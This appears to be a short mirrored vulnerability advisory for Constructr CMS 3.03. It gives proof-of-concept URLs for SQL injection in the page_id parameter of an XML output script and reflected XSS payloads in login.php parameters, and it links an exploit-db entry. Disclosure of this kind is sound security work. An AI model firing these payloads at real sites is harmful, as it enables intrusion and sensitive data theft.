Constructr CMS XSS/SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-03-13T00:00:00
ID MYHACK58:62201129704
Type myhack58
Reporter 佚名
Modified 2011-03-13T00:00:00

Description

Constructr is a content management system, Constructr in the presence ofSQL injectionandXSSvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Constructr CMS 3.03 Miltiple Remote Vulnerabilities (XSS/SQLi) Vendor: phaziz interface design Product web page: http://www.constructr-cms.org Affected version: 3.03.0

[+]poc: ~~~~~~~~~ [SQL] http://constructr/xmlOutput/constructrXmlOutput.content.xml.php?page_id='[INJECT POINT];-- and";-- [XSS] http://constructr/backend/login.php?installed=101&no_user_rights=1 0 1&login_first_echo=1 0 1&already_logged_in=1 0 1&login_user_deactivated=1 0 1&login_failed=1 0 1&login_success=1 0 1&nosaltnpepper=1 0 1&user=1 0 1<script>alert(2)</script>&hash=1 0 1<script>alert(2)</script>

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16963